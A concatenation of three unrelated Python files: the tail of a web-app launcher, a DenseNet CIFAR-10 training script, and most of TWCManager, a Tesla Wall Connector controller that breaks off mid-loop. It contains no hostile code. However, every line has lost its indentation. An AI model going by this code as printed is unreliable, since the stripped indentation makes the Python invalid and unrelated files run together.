import platform
def songs_rank_thread(config):
'''
Songs rank thread
'''
query_loop(config)
def webserver_thread(app):
'''
Ozone app server thread
'''
http_server = HTTPServer(WSGIContainer(app))
http_server.listen(5000)
IOLoop.instance().start()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Ozone app parser')
parser.add_argument("--debug", action="store_true", help="Launch in debug mode")
args = parser.parse_args()
# Judge the platform
platform_info = platform.platform()
if "Windows" in platform_info:
if args.debug:
app = create_app(DevConfigWindows)
# song_thread = threading.Thread(target=songs_rank_thread, args=(DevConfigWindows,))
else:
app = create_app(ProdConfigWindows)
# song_thread = threading.Thread(target=songs_rank_thread, args=(ProdConfigWindows,))
elif "Linux" in platform_info:
if args.debug:
app = create_app(DevConfigLinux)
song_thread = threading.Thread(target=songs_rank_thread, args=(DevConfigLinux,))
song_thread.start()
else:
app = create_app(ProdConfigLinux)
song_thread = threading.Thread(target=songs_rank_thread, args=(ProdConfigLinux,))
song_thread.start()
else:
logger.warning("Unrecognized platform, assuming it works fine with linux platform")
if args.debug:
app = create_app(DevConfigLinux)
song_thread = threading.Thread(target=songs_rank_thread, args=(DevConfigLinux,))
song_thread.start()
else:
app = create_app(ProdConfigLinux)
song_thread = threading.Thread(target=songs_rank_thread, args=(ProdConfigLinux,))
song_thread.start()
# song_thread.start()
if app.config['DEBUG']:
logger.info("Launch in debug mode")
app.run(debug=True)
else:
logger.info("Launch in normal mode")
webserver_thread(app)
|
train_test.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Trains and tests a DenseNet on CIFAR-10.
For usage information, call with --help.
Author: Jan Schlüter
"""
import os
from argparse import ArgumentParser
def opts_parser():
usage = "Trains and tests a DenseNet on CIFAR-10."
parser = ArgumentParser(description=usage)
parser.add_argument(
'-L', '--depth', type=int, default=40,
help='Network depth in layers (default: %(default)s)')
parser.add_argument(
'-k', '--growth-rate', type=int, default=12,
help='Growth rate in dense blocks (default: %(default)s)')
parser.add_argument(
'--dropout', type=float, default=0,
help='Dropout rate (default: %(default)s)')
parser.add_argument(
'--augment', action='store_true', default=True,
help='Perform data augmentation (enabled by default)')
parser.add_argument(
'--no-augment', action='store_false', dest='augment',
help='Disable data augmentation')
parser.add_argument(
'--validate', action='store_true', default=False,
help='Perform validation on validation set (disabled by default)')
parser.add_argument(
'--no-validate', action='store_false', dest='validate',
help='Disable validation')
parser.add_argument(
'--validate-test', action='store_const', dest='validate',
const='test', help='Perform validation on test set')
parser.add_argument(
'--epochs', type=int, default=300,
help='Number of training epochs (default: %(default)s)')
parser.add_argument(
'--eta', type=float, default=0.1,
help='Initial learning rate (default: %(default)s)')
parser.add_argument(
'--save-weights', type=str, default=None, metavar='FILE',
help='If given, save network weights to given .npz file')
parser.add_argument(
'--save-errors', type=str, default=None, metavar='FILE',
help='If given, save train/validation errors to given .npz file')
return parser
def generate_in_background(generator, num_cached=10):
"""
Runs a generator in a background thread, caching up to `num_cached` items.
"""
import Queue
queue = Queue.Queue(maxsize=num_cached)
sentinel = object() # guaranteed unique reference
# define producer (putting items into queue)
def producer():
for item in generator:
queue.put(item)
queue.put(sentinel)
# start producer (in a background thread)
import threading
thread = threading.Thread(target=producer)
thread.daemon = True
thread.start()
# run as consumer (read items from queue, in current thread)
item = queue.get()
while item is not sentinel:
yield item
item = queue.get()
def train_test(depth, growth_rate, dropout, augment, validate, epochs,
eta, save_weights, save_errors, batchsize=64):
# import (deferred until now to make --help faster)
import numpy as np
import theano
import theano.tensor as T
import lasagne
import densenet_fast as densenet # or "import densenet" for slower version
import cifar10
import progress
# instantiate network
print("Instantiating network...")
input_var = T.tensor4('inputs')
target_var = T.ivector('targets')
network = densenet.build_densenet(input_var=input_var, depth=depth,
growth_rate=growth_rate, dropout=dropout)
print("%d layers with weights, %d parameters" %
(sum(hasattr(l, 'W')
for l in lasagne.layers.get_all_layers(network)),
lasagne.layers.count_params(network, trainable=True)))
# load dataset
print("Loading dataset...")
X_train, y_train, X_test, y_test = cifar10.load_dataset(
path=os.path.join(os.path.dirname(__file__), 'data'))
if validate == 'test':
X_val, y_val = X_test, y_test
elif validate:
X_val, y_val = X_train[-5000:], y_train[-5000:]
X_train, y_train = X_train[:-5000], y_train[:-5000]
# define training function
print("Compiling training function...")
prediction = lasagne.layers.get_output(network)
# note: The Keras implementation clips predictions for the categorical
# cross-entropy. This doesn't seem to have a positive effect here.
# prediction = T.clip(prediction, 1e-7, 1 - 1e-7)
loss = lasagne.objectives.categorical_crossentropy(prediction,
target_var).mean()
# note: The paper says 1e-4 decay, but 1e-4 in Torch is 5e-5 elsewhere.
# However, 1e-4 seems to work better than 5e-5, so we use 1e-4.
# note: Torch includes biases in L2 decay. This seems to be important! So
# we decay all 'trainable' parameters, not just 'regularizable' ones.
l2_loss = 1e-4 * lasagne.regularization.regularize_network_params(
network, lasagne.regularization.l2, {'trainable': True})
params = lasagne.layers.get_all_params(network, trainable=True)
eta = theano.shared(lasagne.utils.floatX(eta), name='eta')
updates = lasagne.updates.nesterov_momentum(
loss + l2_loss, params, learning_rate=eta, momentum=0.9)
train_fn = theano.function([input_var, target_var], loss, updates=updates)
l2_fn = theano.function([], l2_loss)
# define validation/testing function
print("Compiling testing function...")
test_prediction = lasagne.layers.get_output(network, deterministic=True)
test_loss = lasagne.objectives.categorical_crossentropy(test_prediction,
target_var).mean()
test_err = 1 - lasagne.objectives.categorical_accuracy(test_prediction,
target_var).mean()
test_fn = theano.function([input_var, target_var], [test_loss, test_err])
# Finally, launch the training loop.
print("Starting training...")
if save_errors:
errors = []
for epoch in range(epochs):
# shrink learning rate at 50% and 75% into training
if epoch == (epochs // 2) or epoch == (epochs * 3 // 4):
eta.set_value(eta.get_value() * lasagne.utils.floatX(0.1))
# In each epoch, we do a full pass over the training data:
train_loss = 0
train_batches = len(X_train) // batchsize
batches = cifar10.iterate_minibatches(X_train, y_train, batchsize,
shuffle=True)
if augment:
batches = cifar10.augment_minibatches(batches)
batches = generate_in_background(batches)
batches = progress.progress(
batches, desc='Epoch %d/%d, Batch ' % (epoch + 1, epochs),
total=train_batches)
for inputs, targets in batches:
train_loss += train_fn(inputs, targets)
# And possibly a full pass over the validation data:
if validate:
val_loss = 0
val_err = 0
val_batches = len(X_val) // batchsize
for inputs, targets in cifar10.iterate_minibatches(X_val, y_val,
batchsize,
shuffle=False):
loss, err = test_fn(inputs, targets)
val_loss += loss
val_err += err
# Then we print the results for this epoch:
train_loss /= train_batches
l2_loss = l2_fn()
print(" training loss:\t%.6f" % train_loss)
print(" L2 loss: \t%.6f" % l2_loss)
if save_errors:
errors.extend([train_loss, l2_loss])
if validate:
val_loss /= val_batches
val_err /= val_batches
print(" validation loss:\t%.6f" % val_loss)
print(" validation error:\t%.2f%%" % (val_err * 100))
if save_errors:
errors.extend([val_loss, val_err])
# After training, we compute and print the test error:
test_loss = 0
test_err = 0
test_batches = len(X_test) // batchsize
for inputs, targets in cifar10.iterate_minibatches(X_test, y_test,
batchsize,
shuffle=False):
loss, err = test_fn(inputs, targets)
test_loss += loss
test_err += err
print("Final results:")
print(" test loss:\t\t%.6f" % (test_loss / test_batches))
print(" test error:\t\t%.2f%%" % (test_err / test_batches * 100))
# Optionally, we dump the network weights to a file
if save_weights:
np.savez(save_weights, *lasagne.layers.get_all_param_values(network))
# Optionally, we dump the learning curves to a file
if save_errors:
errors = np.asarray(errors).reshape(epochs, -1)
np.savez(save_errors, errors=errors)
def main():
# parse command line
parser = opts_parser()
args = parser.parse_args()
# run
train_test(**vars(args))
if __name__ == "__main__":
main()
|
TWCManager.py
|
#! /usr/bin/python3
################################################################################
# Code and TWC protocol reverse engineering by Chris Dragon.
#
# Additional logs and hints provided by Teslamotorsclub.com users:
# TheNoOne, IanAmber, and twc.
# Thank you!
#
# For support and information, please read through this thread:
# https://teslamotorsclub.com/tmc/threads/new-wall-connector-load-sharing-protocol.72830
#
# Report bugs at https://github.com/ngardiner/TWCManager/issues
#
# This software is released under the "Unlicense" model: http://unlicense.org
# This means source code and TWC protocol knowledge are released to the general
# public free for personal or commercial use. I hope the knowledge will be used
# to increase the use of green energy sources by controlling the time and power
# level of car charging.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please visit http://unlicense.org
import commentjson
import importlib
import json
import logging
import os.path
import math
import re
import sys
import time
import traceback
from datetime import datetime
import threading
from ww import f
from lib.TWCManager.TWCMaster import TWCMaster
import requests
from enum import Enum
logging.addLevelName(19, "INFO2")
logging.addLevelName(18, "INFO4")
logging.addLevelName(17, "INFO4")
logging.addLevelName(16, "INFO5")
logging.addLevelName(15, "INFO6")
logging.addLevelName(14, "INFO7")
logging.addLevelName(13, "INFO8")
logging.addLevelName(12, "INFO9")
logging.addLevelName(9, "DEBUG2")
logging.INFO2 = 19
logging.INFO3 = 18
logging.INFO4 = 17
logging.INFO5 = 16
logging.INFO6 = 15
logging.INFO7 = 14
logging.INFO8 = 13
logging.INFO9 = 12
logging.DEBUG2 = 9
logger = logging.getLogger("TWCManager")
# Define available modules for the instantiator
# All listed modules will be loaded at boot time
# Logging modules should be the first one to load
modules_available = [
"Logging.ConsoleLogging",
"Logging.FileLogging",
"Logging.SentryLogging",
"Logging.CSVLogging",
"Logging.MySQLLogging",
"Logging.SQLiteLogging",
"Protocol.TWCProtocol",
"Interface.Dummy",
"Interface.RS485",
"Interface.TCP",
"Policy.Policy",
"Vehicle.TeslaAPI",
"Control.WebIPCControl",
"Control.HTTPControl",
"Control.MQTTControl",
# "Control.OCPPControl",
"EMS.Efergy",
"EMS.Enphase",
"EMS.Fronius",
"EMS.Growatt",
"EMS.HASS",
"EMS.Kostal",
"EMS.OpenHab",
"EMS.OpenWeatherMap",
"EMS.SmartMe",
"EMS.SmartPi",
"EMS.SolarEdge",
"EMS.SolarLog",
"EMS.TeslaPowerwall2",
"EMS.TED",
"EMS.Volkszahler",
"Status.HASSStatus",
"Status.MQTTStatus",
]
# Enable support for Python Visual Studio Debugger
if "DEBUG_SECRET" in os.environ:
import ptvsd
ptvsd.enable_attach(os.environ["DEBUG_SECRET"])
ptvsd.wait_for_attach()
##########################
# Load Configuration File
config = None
jsonconfig = None
if os.path.isfile("/etc/twcmanager/config.json"):
jsonconfig = open("/etc/twcmanager/config.json")
else:
if os.path.isfile("config.json"):
jsonconfig = open("config.json")
if jsonconfig:
config = commentjson.load(jsonconfig)
else:
logger.error("Unable to find a configuration file.")
sys.exit()
logLevel = config["config"].get("logLevel")
if logLevel == None:
debugLevel = config["config"].get("debugLevel", 1)
debug_to_log = {
0: 40,
1: 20,
2: 19,
3: 18,
4: 17,
5: 16,
6: 15,
7: 14,
8: 13,
9: 12,
10: 10,
11: 9,
}
for debug, log in debug_to_log.items():
if debug >= debugLevel:
logLevel = log
break
logging.getLogger().setLevel(logLevel)
# All TWCs ship with a random two-byte TWCID. We default to using 0x7777 as our
# fake TWC ID. There is a 1 in 64535 chance that this ID will match each real
# TWC on the network, in which case you should pick a different random id below.
# This isn't really too important because even if this ID matches another TWC on
# the network, that TWC will pick its own new random ID as soon as it sees ours
# conflicts.
fakeTWCID = bytearray(b"\x77\x77")
#
# End configuration parameters
#
##############################
##############################
#
# Begin functions
#
def hex_str(s: str):
return " ".join("{:02X}".format(ord(c)) for c in s)
def hex_str(ba: bytearray):
return " ".join("{:02X}".format(c) for c in ba)
def time_now():
global config
return datetime.now().strftime(
"%H:%M:%S" + (".%f" if config["config"]["displayMilliseconds"] else "")
)
def unescape_msg(inmsg: bytearray, msgLen):
# Given a message received on the RS485 network, remove leading and trailing
# C0 byte, unescape special byte values, and verify its data matches the CRC
# byte.
# Note that a bytearray is mutable, whereas a bytes object isn't.
# By initializing a bytearray and concatenating the incoming bytearray
# to it, we protect against being passed an immutable bytes object
msg = bytearray() + inmsg[0:msgLen]
# See notes in RS485.send() for the way certain bytes in messages are escaped.
# We basically want to change db dc into c0 and db dd into db.
# Only scan to one less than the length of the string to avoid running off
# the end looking at i+1.
i = 0
while i < len(msg):
if msg[i] == 0xDB:
if msg[i + 1] == 0xDC:
# Replace characters at msg[i] and msg[i+1] with 0xc0,
# shortening the string by one character. In Python, msg[x:y]
# refers to a substring starting at x and ending immediately
# before y. y - x is the length of the substring.
msg[i : i + 2] = [0xC0]
elif msg[i + 1] == 0xDD:
msg[i : i + 2] = [0xDB]
else:
logger.info(
"ERROR: Special character 0xDB in message is "
"followed by invalid character 0x%02X. "
"Message may be corrupted." % (msg[i + 1])
)
# Replace the character with something even though it's probably
# not the right thing.
msg[i : i + 2] = [0xDB]
i = i + 1
# Remove leading and trailing C0 byte.
msg = msg[1 : len(msg) - 1]
return msg
def background_tasks_thread(master):
carapi = master.getModuleByName("TeslaAPI")
while True:
try:
task = master.getBackgroundTask()
if task["cmd"] == "applyChargeLimit":
carapi.applyChargeLimit(limit=task["limit"])
elif task["cmd"] == "charge":
# car_api_charge does nothing if it's been under 60 secs since it
# was last used so we shouldn't have to worry about calling this
# too frequently.
carapi.car_api_charge(task["charge"])
elif task["cmd"] == "carApiEmailPassword":
carapi.resetCarApiLastErrorTime()
carapi.car_api_available(task["email"], task["password"])
elif task["cmd"] == "checkArrival":
limit = (
carapi.lastChargeLimitApplied
if carapi.lastChargeLimitApplied != 0
else -1
)
carapi.applyChargeLimit(limit=limit, checkArrival=True)
elif task["cmd"] == "checkCharge":
carapi.updateChargeAtHome()
elif task["cmd"] == "checkDeparture":
carapi.applyChargeLimit(
limit=carapi.lastChargeLimitApplied, checkDeparture=True
)
elif task["cmd"] == "checkGreenEnergy":
check_green_energy()
elif task["cmd"] == "checkVINEntitlement":
# The two possible arguments are task["subTWC"] which tells us
# which TWC to check, or task["vin"] which tells us which VIN
if task.get("vin", None):
task["subTWC"] = master.getTWCbyVIN(task["vin"])
if task["subTWC"]:
if master.checkVINEntitlement(task["subTWC"]):
logger.info("Vehicle %s on TWC %02X%02X is permitted to charge." % (task["subTWC"].currentVIN, task["subTWC"].TWCID[0], task["subTWC"].TWCID[1]))
else:
logger.info("Vehicle %s on TWC %02X%02X is not permitted to charge. Terminating session." % (task["subTWC"].currentVIN, task["subTWC"].TWCID[0], task["subTWC"].TWCID[1]))
master.sendStopCommand(task["subTWC"].TWCID)
elif task["cmd"] == "getLifetimekWh":
master.getSlaveLifetimekWh()
elif task["cmd"] == "getVehicleVIN":
master.getVehicleVIN(task["slaveTWC"], task["vinPart"])
elif task["cmd"] == "snapHistoryData":
master.snapHistoryData()
elif task["cmd"] == "updateStatus":
update_statuses()
elif task["cmd"] == "webhook":
if config["config"].get("webhookMethod", "POST") == "GET":
requests.get(task["url"])
else:
body = master.getStatus()
requests.post(task["url"], json=body)
elif task["cmd"] == "saveSettings":
master.saveSettings()
except:
logger.info(
"%s: "
+ traceback.format_exc()
+ ", occurred when processing background task",
"BackgroundError",
extra={"colored": "red"},
)
pass
# Delete task['cmd'] from backgroundTasksCmds such that
# queue_background_task() can queue another task['cmd'] in the future.
master.deleteBackgroundTask(task)
# task_done() must be called to let the queue know the task is finished.
# backgroundTasksQueue.join() can then be used to block until all tasks
# in the queue are done.
master.doneBackgroundTask()
def check_green_energy():
global config, hass, master
# Check solar panel generation using an API exposed by
# the HomeAssistant API.
#
# You may need to customize the sensor entity_id values
# to match those used in your environment. This is configured
# in the config section at the top of this file.
#
# Poll all loaded EMS modules for consumption and generation values
for module in master.getModulesByType("EMS"):
master.setConsumption(module["name"], module["ref"].getConsumption())
master.setGeneration(module["name"], module["ref"].getGeneration())
# Set max amps iff charge_amps isn't specified on the policy.
if master.getModuleByName("Policy").policyIsGreen():
master.setMaxAmpsToDivideAmongSlaves(master.getMaxAmpsToDivideGreenEnergy())
def update_statuses():
# Print a status update if we are on track green energy showing the
# generation and consumption figures
maxamps = master.getMaxAmpsToDivideAmongSlaves()
maxampsDisplay = f("{maxamps:.2f}A")
if master.getModuleByName("Policy").policyIsGreen():
genwatts = master.getGeneration()
conwatts = master.getConsumption()
conoffset = master.getConsumptionOffset()
chgwatts = master.getChargerLoad()
othwatts = 0
if config["config"]["subtractChargerLoad"]:
if conwatts > 0:
othwatts = conwatts - chgwatts
if conoffset > 0:
othwatts -= conoffset
# Extra parameters to send with logs
logExtra = {
"logtype": "green_energy",
"genWatts": genwatts,
"conWatts": conwatts,
"chgWatts": chgwatts,
"colored": "magenta"
}
if ((genwatts or conwatts) and (not conoffset and not othwatts)):
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s)",
f("{genwatts:.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
extra=logExtra,
)
elif ((genwatts or conwatts) and othwatts and not conoffset):
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s)",
f("{genwatts:.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
f("{othwatts:.0f}W"),
extra=logExtra,
)
elif ((genwatts or conwatts) and othwatts and conoffset > 0):
logger.info(
"Green energy Generates %s, Consumption %s (Charger Load %s, Other Load %s, Offset %s)",
f("{genwatts:.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
f("{othwatts:.0f}W"),
f("{conoffset:.0f}W"),
extra=logExtra,
)
elif ((genwatts or conwatts) and othwatts and conoffset < 0):
logger.info(
"Green energy Generates %s (Offset %s), Consumption %s (Charger Load %s, Other Load %s)",
f("{genwatts:.0f}W"),
f("{(-1 * conoffset):.0f}W"),
f("{conwatts:.0f}W"),
f("{chgwatts:.0f}W"),
f("{othwatts:.0f}W"),
extra=logExtra,
)
nominalOffer = master.convertWattsToAmps(
genwatts + (chgwatts if (config["config"]["subtractChargerLoad"] and conwatts == 0) else 0)
- (conwatts - (chgwatts if (config["config"]["subtractChargerLoad"] and conwatts > 0) else 0))
)
if abs(maxamps - nominalOffer) > 0.005:
nominalOfferDisplay = f("{nominalOffer:.2f}A")
logger.debug(
f(
"Offering {maxampsDisplay} instead of {nominalOfferDisplay} to compensate for inexact current draw"
)
)
conwatts = genwatts - master.convertAmpsToWatts(maxamps)
generation = f("{master.convertWattsToAmps(genwatts):.2f}A")
consumption = f("{master.convertWattsToAmps(conwatts):.2f}A")
logger.info(
"Limiting charging to %s - %s = %s.",
generation,
consumption,
maxampsDisplay,
extra={"colored": "magenta"},
)
else:
# For all other modes, simply show the Amps to charge at
logger.info(
"Limiting charging to %s.", maxampsDisplay, extra={"colored": "magenta"}
)
# Print minimum charge for all charging policies
minchg = f("{config['config']['minAmpsPerTWC']}A")
logger.info(
"Charge when above %s (minAmpsPerTWC).", minchg, extra={"colored": "magenta"}
)
# Update Sensors with min/max amp values
for module in master.getModulesByType("Status"):
module["ref"].setStatus(
bytes("config", "UTF-8"),
"min_amps_per_twc",
"minAmpsPerTWC",
config["config"]["minAmpsPerTWC"],
"A",
)
module["ref"].setStatus(
bytes("all", "UTF-8"),
"max_amps_for_slaves",
"maxAmpsForSlaves",
master.getMaxAmpsToDivideAmongSlaves(),
"A",
)
#
# End functions
#
##############################
##############################
#
# Begin global vars
#
data = ""
dataLen = 0
ignoredData = bytearray()
msg = bytearray()
msgLen = 0
numInitMsgsToSend = 10
msgRxCount = 0
idxSlaveToSendNextHeartbeat = 0
timeLastkWhDelivered = time.time()
timeLastkWhSaved = time.time()
timeLastHeartbeatDebugOutput = 0
webMsgPacked = ""
webMsgMaxSize = 300
webMsgResult = 0
timeTo0Aafter06 = 0
timeToRaise2A = 0
#
# End global vars
#
##############################
##############################
#
# Begin main program
#
# Instantiate necessary classes
master = TWCMaster(fakeTWCID, config)
# Instantiate all modules in the modules_available list automatically
for module in modules_available:
modulename = []
if str(module).find(".") != -1:
modulename = str(module).split(".")
try:
# Pre-emptively skip modules that we know are not configured
configlocation = master.translateModuleNameToConfig(modulename)
if not config.get(configlocation[0], {}).get(configlocation[1], {}).get("enabled", 1):
# We can see that this module is explicitly disabled in config, skip it
continue
moduleref = importlib.import_module("lib.TWCManager." + module)
modclassref = getattr(moduleref, modulename[1])
modinstance = modclassref(master)
# Register the new module with master class, so every other module can
# interact with it
master.registerModule(
{"name": modulename[1], "ref": modinstance, "type": modulename[0]}
)
except ImportError as e:
logger.error(
"%s: " + str(e) + ", when importing %s, not using %s",
"ImportError",
module,
module,
extra={"colored": "red"},
)
except ModuleNotFoundError as e:
logger.info(
"%s: " + str(e) + ", when importing %s, not using %s",
"ModuleNotFoundError",
module,
module,
extra={"colored": "red"},
)
except:
raise
# Load settings from file
master.loadSettings()
# Create a background thread to handle tasks that take too long on the main
# thread. For a primer on threads in Python, see:
# http://www.laurentluce.com/posts/python-threads-synchronization-locks-rlocks-semaphores-conditions-events-and-queues/
backgroundTasksThread = threading.Thread(target=background_tasks_thread, args=(master,))
backgroundTasksThread.daemon = True
backgroundTasksThread.start()
logger.info(
"TWC Manager starting as fake %s with id %02X%02X and sign %02X"
% (
("Master" if config["config"]["fakeMaster"] else "Slave"),
ord(fakeTWCID[0:1]),
ord(fakeTWCID[1:2]),
ord(master.getSlaveSign()),
)
)
while True:
try:
# In this area, we always send a linkready message when we first start.
# Whenever there is no data available from other TWCs to respond to,
# we'll loop back to this point to send another linkready or heartbeat
# message. By only sending our periodic messages when no incoming
# message data is available, we reduce the chance that we will start
# transmitting a message in the middle of an incoming message, which
# would corrupt both messages.
# Add a 25ms sleep to prevent pegging pi's CPU at 100%. Lower CPU means
# less power used and less waste heat.
time.sleep(0.025)
now = time.time()
if config["config"]["fakeMaster"] == 1:
# A real master sends 5 copies of linkready1 and linkready2 whenever
# it starts up, which we do here.
# It doesn't seem to matter if we send these once per second or once
# per 100ms so I do once per 100ms to get them over with.
if numInitMsgsToSend > 5:
master.send_master_linkready1()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend -= 1
elif numInitMsgsToSend > 0:
master.send_master_linkready2()
time.sleep(0.1) # give slave time to respond
numInitMsgsToSend = numInitMsgsToSend - 1
else:
# After finishing the 5 startup linkready1 and linkready2
# messages, master will send a heartbeat message to every slave
# it's received a linkready message from. Do that here.
# A real master would keep sending linkready messages periodically
# as long as no slave was connected, but since real slaves send
# linkready once every 10 seconds till they're connected to a
# master, we'll just wait for that.
if time.time() - master.getTimeLastTx() >= 1.0:
# It's been about a second since our last heartbeat.
if master.countSlaveTWC() > 0:
slaveTWC = master.getSlaveTWC(idxSlaveToSendNextHeartbeat)
if time.time() - slaveTWC.timeLastRx > 26:
# A real master stops sending heartbeats to a slave
# that hasn't responded for ~26 seconds. It may
# still send the slave a heartbeat every once in
# awhile but we're just going to scratch the slave
# from our little black book and add them again if
# they ever send us a linkready.
logger.info(
"WARNING: We haven't heard from slave "
"%02X%02X for over 26 seconds. "
"Stop sending them heartbeat messages."
% (slaveTWC.TWCID[0], slaveTWC.TWCID[1])
)
master.deleteSlaveTWC(slaveTWC.TWCID)
else:
slaveTWC.send_master_heartbeat()
idxSlaveToSendNextHeartbeat = idxSlaveToSendNextHeartbeat + 1
if idxSlaveToSendNextHeartbeat >= master.countSlaveTWC():
idxSlaveToSendNextHeartbeat = 0
time.sleep(0.1) # give slave time to respond
else:
# As long as a slave is running, it sends link ready messages every
# 10 seconds. They trigger any master on the network to handshake
# with the slave and the master then sends a status update from the
# slave every 1-3 seconds. Master's status updates trigger the slave
# to send back its own status update.
# As long as master has sent a status update within the last 10
# seconds, slaves don't send link ready.
# I've also verified that masters don't care if we stop sending link
# ready as long as we send status updates in response to master's
# status updates.
if (
config["config"]["fakeMaster"] != 2
and time.time() - master.getTimeLastTx() >= 10.0
):
logger.info(
"Advertise fake slave %02X%02X with sign %02X is "
"ready to link once per 10 seconds as long as master "
"hasn't sent a heartbeat in the last 10 seconds."
% (
ord(fakeTWCID[0:1]),
ord(fakeTWCID[1:2]),
ord(master.getSlaveSign()),
)
)
master.send_slave_linkready()
# See if there's any message from the web interface.
if master.getModuleByName("WebIPCControl"):
master.getModuleByName("WebIPCControl").processIPC()
# If it has been more than 2 minutes since the last kWh value,
# queue the command to request it from slaves
if config["config"]["fakeMaster"] == 1 and (
(time.time() - master.lastkWhMessage) > (60 * 2)
):
master.lastkWhMessage = time.time()
master.queue_background_task({"cmd": "getLifetimekWh"})
# If it has been more than 1 minute since the last VIN query with no
# response, and if we haven't queried more than 5 times already for this
# slave TWC, repeat the query
master.retryVINQuery()
########################################################################
# See if there's an incoming message on the input interface.
timeMsgRxStart = time.time()
actualDataLen = 0
while True:
now = time.time()
dataLen = master.getInterfaceModule().getBufferLen()
if dataLen == 0:
if msgLen == 0:
# No message data waiting and we haven't received the
# start of a new message yet. Break out of inner while
# to continue at top of outer while loop where we may
# decide to send a periodic message.
break
else:
# No message data waiting but we've received a partial
# message that we should wait to finish receiving.
if now - timeMsgRxStart >= 2.0:
logger.log(
logging.INFO9,
"Msg timeout ("
+ hex_str(ignoredData)
+ ") "
+ hex_str(msg[0:msgLen]),
)
msgLen = 0
ignoredData = bytearray()
break
time.sleep(0.025)
continue
else:
actualDataLen = dataLen
dataLen = 1
data = master.getInterfaceModule().read(dataLen)
if dataLen != 1:
# This should never happen
logger.info("WARNING: No data available.")
break
timeMsgRxStart = now
timeLastRx = now
if msgLen == 0 and len(data) > 0 and data[0] != 0xC0:
# We expect to find these non-c0 bytes between messages, so
# we don't print any warning at standard debug levels.
logger.log(
logging.DEBUG2, "Ignoring byte %02X between messages." % (data[0])
)
ignoredData += data
continue
elif msgLen > 0 and msgLen < 15 and len(data) > 0 and data[0] == 0xC0:
# If you see this when the program is first started, it
# means we started listening in the middle of the TWC
# sending a message so we didn't see the whole message and
# must discard it. That's unavoidable.
# If you see this any other time, it means there was some
# corruption in what we received. It's normal for that to
# happen every once in awhile but there may be a problem
# such as incorrect termination or bias resistors on the
# rs485 wiring if you see it frequently.
logger.debug(
"Found end of message before full-length message received. "
"Discard and wait for new message."
)
msg = data
msgLen = 1
continue
elif dataLen and len(data) == 0:
logger.error(
"We received a buffer length of %s from the RS485 module, but data buffer length is %s. This should not occur." % (str(actualDataLen), str(len(data)))
)
if msgLen == 0:
msg = bytearray()
msg += data
msgLen += 1
# Messages are usually 17 bytes or longer and end with \xc0\xfe.
# However, when the network lacks termination and bias
# resistors, the last byte (\xfe) may be corrupted or even
# missing, and you may receive additional garbage bytes between
# messages.
#
# TWCs seem to account for corruption at the end and between
# messages by simply ignoring anything after the final \xc0 in a
# message, so we use the same tactic. If c0 happens to be within
# the corrupt noise between messages, we ignore it by starting a
# new message whenever we see a c0 before 15 or more bytes are
# received.
#
# Uncorrupted messages can be over 17 bytes long when special
# values are "escaped" as two bytes. See notes in sendMsg.
#
# To prevent most noise between messages, add a 120ohm
# "termination" resistor in parallel to the D+ and D- lines.
# Also add a 680ohm "bias" resistor between the D+ line and +5V
# and a second 680ohm "bias" resistor between the D- line and
# ground. See here for more information:
# https://www.ni.com/support/serial/resinfo.htm
# http://www.ti.com/lit/an/slyt514/slyt514.pdf
# This explains what happens without "termination" resistors:
# https://e2e.ti.com/blogs_/b/analogwire/archive/2016/07/28/rs-485-basics-when-termination-is-necessary-and-how-to-do-it-properly
if msgLen >= 16 and data[0] == 0xC0:
break
if msgLen >= 16:
msg = unescape_msg(msg, msgLen)
# Set msgLen = 0 at start so we don't have to do it on errors below.
# len($msg) now contains the unescaped message length.
msgLen = 0
msgRxCount += 1
# When the sendTWCMsg web command is used to send a message to the
# TWC, it sets lastTWCResponseMsg = b''. When we see that here,
# set lastTWCResponseMsg to any unusual message received in response
# to the sent message. Never set lastTWCResponseMsg to a commonly
# repeated message like master or slave linkready, heartbeat, or
# voltage/kWh report.
if (
master.lastTWCResponseMsg == b""
and msg[0:2] != b"\xFB\xE0"
and msg[0:2] != b"\xFD\xE0"
and msg[0:2] != b"\xFC\xE1"
and msg[0:2] != b"\xFB\xE2"
and msg[0:2] != b"\xFD\xE2"
and msg[0:2] != b"\xFB\xEB"
and msg[0:2] != b"\xFD\xEB"
and msg[0:2] != b"\xFD\xE0"
):
master.lastTWCResponseMsg = msg
logger.log(
logging.INFO9,
"Rx@" + ": (" + hex_str(ignoredData) + ") " + hex_str(msg) + "",
)
ignoredData = bytearray()
# After unescaping special values and removing the leading and
# trailing C0 bytes, the messages we know about are always 14 bytes
# long in original TWCs, or 16 bytes in newer TWCs (protocolVersion
# == 2).
if len(msg) != 14 and len(msg) != 16 and len(msg) != 20:
logger.info(
"ERROR: Ignoring message of unexpected length %d: %s"
% (len(msg), hex_str(msg))
)
continue
checksumExpected = msg[len(msg) - 1]
checksum = 0
for i in range(1, len(msg) - 1):
checksum += msg[i]
if (checksum & 0xFF) != checksumExpected:
logger.info(
"ERROR: Checksum %X does not match %02X. Ignoring message: %s"
% (checksum, checksumExpected, hex_str(msg))
)
continue
if config["config"]["fakeMaster"] == 1:
############################
# Pretend to be a master TWC
foundMsgMatch = False
# We end each regex message search below with \Z instead of $
# because $ will match a newline at the end of the string or the
# end of the string (even without the re.MULTILINE option), and
# sometimes our strings do end with a newline character that is
# actually the CRC byte with a value of 0A or 0D.
msgMatch = re.search(b"^\xfd\xb1(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Start command
foundMsgMatch = True
senderID = msgMatch.group(1)
